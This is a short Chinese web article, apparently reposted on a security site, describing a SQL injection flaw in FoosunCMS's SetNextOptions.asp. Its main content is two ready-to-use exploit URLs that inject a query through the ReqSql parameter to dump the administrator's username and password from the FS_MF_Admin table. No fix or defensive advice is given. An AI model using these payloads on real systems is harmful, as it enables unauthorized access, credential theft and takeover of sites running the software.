首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
来源:http://hi.baidu.com/5427518/blog/item 作者:qing 发布时间:2011-05-30  

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件,国内领先的第一款开源的、集成web2.0元素的、模块化的CMS建站系统。
风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。

漏洞文件:

    http://www.hackqing.com/user/SetNextOptions.asp

利用简单的方法:

暴管理员帐号:

    http://www.hackqing.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

暴管理员密码:

    http://www.hackqing.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin



 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·讯时网站管理系统CMS v4.0以下版
·Foxmail Server上传漏洞&任意文
·Zen Cart 商城系统,上传、跨站
·Mathew Callingham Associatess
·simple-log v1.3.1 注入漏洞
·网奇CWMS企业网站管理系统1.0-2.
·PHP168任意代码执行GET SHELL漏
·Discuz!7.0-7.2和Phpwind7.5后台
·稻草人企业站管理系统宽字节注入
·joomla CMS 后台另类拿 WebShell
·dedecms 5.7后台拿SHELL
·教育站漏洞批量拿shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved